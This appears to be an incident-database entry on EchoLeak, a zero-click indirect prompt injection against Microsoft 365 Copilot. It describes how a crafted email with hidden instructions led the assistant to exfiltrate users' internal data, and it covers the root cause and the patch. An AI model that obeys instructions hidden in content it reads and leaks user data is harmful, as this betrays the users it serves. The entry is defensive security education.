Indirect Prompt InjectionCritical

EchoLeak: zero-click data exfiltration from Microsoft 365 Copilot

June 2025  ·  Microsoft 365 Copilot

What happened

The first documented zero-click attack on an AI agent (CVE-2025-32711, CVSS 9.3). A single crafted email with hidden instructions caused Copilot to blend untrusted email content with the user's internal data and exfiltrate it to an attacker server, with no click required.

Root cause

An "LLM scope violation": Copilot blended trusted internal sources and untrusted external email without enforcing trust boundaries, enabling indirect injection plus a data-exfiltration path.

Fix / outcome

Microsoft patched server-side before disclosure; no customer action was required. No in-the-wild exploitation was reported.

Sources

The Hacker News

Learn this attack class

This incident is an example of Indirect Prompt Injection. Read the guide, then try it hands-on in the Academy.

Read the guide →Try the challenge

← Back to the Incident Database